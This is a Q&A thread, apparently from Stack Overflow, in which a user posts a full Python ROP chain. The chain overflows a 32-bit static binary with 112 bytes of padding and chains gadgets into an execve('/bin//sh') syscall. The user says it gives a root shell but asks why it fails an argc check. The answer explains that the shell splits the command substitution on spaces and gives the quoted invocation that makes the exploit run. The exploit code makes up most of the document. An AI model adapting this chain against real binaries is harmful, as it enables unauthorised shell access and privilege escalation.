0

I have created an ROP attack chain which I know works since I have tested it with another program without the problem code.

My problem is whenever I run my ROP chain as an input argument into my target binary file, it can't get pass this part:

if (argc !=2){
fprintf(stderr, "Error:need a command-line argument\n");
return 1;
}

I am running it like: ./target $(python inject.py)

Below is my attack chain:

#!/usr/bin/env python2

from struct import pack

p = 'A'*112

p += pack('<I', 0x080572fa) # pop edx ; ret
p += pack('<I', 0x080ef060) # @ .data
p += pack('<I', 0x080c2316) # pop eax ; ret
p += '/bin'
p += pack('<I', 0x0808e93d) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080572fa) # pop edx ; ret
p += pack('<I', 0x080ef064) # @ .data + 4
p += pack('<I', 0x080c2316) # pop eax ; ret
p += '//sh'
p += pack('<I', 0x0808e93d) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080572fa) # pop edx ; ret
p += pack('<I', 0x080ef068) # @ .data + 8
p += pack('<I', 0x08051710) # xor eax, eax ; ret
p += pack('<I', 0x0808e93d) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481ec) # pop ebx ; ret
p += pack('<I', 0x080ef060) # @ .data
p += pack('<I', 0x080e3cc6) # pop ecx ; ret
p += pack('<I', 0x080ef068) # @ .data + 8
p += pack('<I', 0x080572fa) # pop edx ; ret
p += pack('<I', 0x080ef068) # @ .data + 8
p += pack('<I', 0x08051710) # xor eax, eax ; ret
p += pack('<I', 0x0809a506) # inc eax ; ret
p += pack('<I', 0x0809a506) # inc eax ; ret
p += pack('<I', 0x0809a506) # inc eax ; ret
p += pack('<I', 0x0809a506) # inc eax ; ret
p += pack('<I', 0x0809a506) # inc eax ; ret
p += pack('<I', 0x0809a506) # inc eax ; ret
p += pack('<I', 0x0809a506) # inc eax ; ret
p += pack('<I', 0x0809a506) # inc eax ; ret
p += pack('<I', 0x0809a506) # inc eax ; ret
p += pack('<I', 0x0809a506) # inc eax ; ret
p += pack('<I', 0x0809a506) # inc eax ; ret
p += pack('<I', 0x080494b9) # int 0x80
print p

When I remove the check for arguments above it works giving me root access to terminal and works.

These are the headers I compiled the program with: -g -m32 -static -U_FORTIFY_SOURCE -fno-stack-protector

The target has DEP on.

Daniel
  • 11
  • 5

1 Answers1

0

Your argc is not 2 when it is called with ./target $(python inject.py). The command substitution $() executes, returns then sends its value, splitting on each space causing the number of arguments to ./target to be greater than 2.

To prevent the shell from splitting on each space in the command substitution, put quotes around the command substitution to prevent it from splitting the result and instead take it as a single parameter.

Change:

./target $(python inject.py)

to

./target "$(python inject.py)"

Check out the following for more information:

Community
  • 1
  • 1
0xcaff
  • 13,085
  • 5
  • 47
  • 55